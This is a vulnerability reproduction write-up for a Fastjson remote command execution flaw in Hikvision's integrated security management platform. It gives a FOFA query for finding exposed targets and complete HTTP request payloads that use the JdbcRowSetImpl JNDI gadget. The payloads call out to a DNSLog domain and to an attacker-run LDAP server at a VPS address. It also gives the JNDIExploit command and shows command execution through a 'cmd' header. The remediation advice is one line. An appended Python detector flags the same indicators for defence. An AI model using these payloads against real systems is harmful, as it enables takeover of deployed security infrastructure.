Hikvision Integrated Security Management Platform Fastjson Remote Command Execution Vulnerability
Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination or use of the information or tools provided in this article are the responsibility of the user; they have nothing to do with the author. This article is for educational purposes only.
1. Brief Introduction of Hikvision Integrated Security Management Platform
The integrated security management platform is designed around the concept of a "unified software technology architecture" and uses business component technology so that the platform can scale elastically with business needs. The platform applies to general integrated security business across industries. It integrates and centrally manages the resources of each subsystem, providing unified deployment, configuration, management and scheduling.
2. Vulnerability description
Hikvision's integrated security management platform has a Fastjson remote command execution vulnerability. An attacker can use it to execute system commands on the target server and obtain system privileges and sensitive data.
3. Affected versions
V2.0.0 <= iVMS-8700 <= V2.9.2
V1.0.0 <= iSecure Center <= V1.7.0
4. Vulnerability reproduction
FOFA: app="HIKVISION-Comprehensive Security Management Platform"
The request that triggers the vulnerability is as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 196
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
First, test whether the LDAP lookup reaches the DNSLog domain. If the DNSLog platform receives the request, there is a high probability that the command execution vulnerability exists.
The Xiaolong POC tool also supports a one-click check for this vulnerability.
Xiaolong POC portal: Xiaolong POC tool
After confirming that DNSLog receives the request, the vulnerability can be exploited further. Use the JNDIExploit-1.3-SNAPSHOT.jar tool and run the following command:
Tool download address: JNDIExploit
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip
Then add a header field to the request in Burp: cmd: whoami
The cmd header carries the system command to be executed. In the payload below, replace the ldap address with your own VPS IP in the form ldap://<VPS IP>:1389/Basic/TomcatEcho, as follows:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215
{
"a":{
"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
Send the request in Burp, and the command executes successfully!
5. Remediation
The vendor has released patches; download the patch for your version from the official website.
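As an added defensive example (not part of the original write-up), the following Python scans raw HTTP requests for the traces this payload leaves: the Fastjson "@type" key, the com.sun.rowset.JdbcRowSetImpl gadget, an ldap:// or rmi:// dataSourceName, and the out-of-band cmd header. The sample requests are constructed from the request shown above with headers trimmed; the indicator names are my own.

```python
import json
import re

# Indicators from the request shown in this write-up: a Fastjson "@type" key,
# the JdbcRowSetImpl gadget, a JNDI dataSourceName and the out-of-band "cmd" header.
JNDI_URL = re.compile(r"^(ldap|ldaps|rmi)://", re.IGNORECASE)
GADGET = "com.sun.rowset.JdbcRowSetImpl"

def split_request(raw):
    # Split a raw HTTP request into (path, lower-cased header dict, body).
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.splitlines()
    headers = {n.strip().lower(): v.strip() for n, _, v in (h.partition(":") for h in header_lines)}
    return request_line.split()[1], headers, body.strip()

def walk(obj):
    # Yield every (key, value) pair at any depth of a parsed JSON document.
    items = obj.items() if isinstance(obj, dict) else enumerate(obj) if isinstance(obj, list) else ()
    for key, value in items:
        yield key, value
        yield from walk(value)

def detect(raw):
    # Return the sorted set of indicator names present in one raw request.
    path, headers, body = split_request(raw)
    hits = set()
    if path.startswith("/bic/ssoService/v1/applyCT"):
        hits.add("sso-applyct-endpoint")
    if "cmd" in headers:
        hits.add("cmd-header")
    try:
        doc = json.loads(body) if body else {}
    except ValueError:
        return sorted(hits)  # body is not JSON: nothing more to inspect
    for key, value in walk(doc):
        if key == "@type":
            hits.add("fastjson-autotype")
            if value == GADGET:
                hits.add("jdbcrowset-gadget")
        if key == "dataSourceName" and isinstance(value, str) and JNDI_URL.match(value):
            hits.add("jndi-datasource")
    return sorted(hits)

# Constructed samples: the write-up's payload (headers trimmed) and a benign request.
MALICIOUS = ("POST /bic/ssoService/v1/applyCT HTTP/1.1\nHost: 127.0.0.1\n"
             "Content-Type: application/json\ncmd: whoami\n\n"
             '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
             '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnslog.cn","autoCommit":true}}')
BENIGN = ("POST /bic/ssoService/v1/applyCT HTTP/1.1\nHost: 127.0.0.1\n"
          "Content-Type: application/json\n\n" '{"username":"alice","ticket":"abc123"}')
```

A request scoring more than the endpoint indicator alone (in particular the gadget or JNDI dataSourceName) is worth blocking at the WAF and alerting on, regardless of whether the patch is already applied.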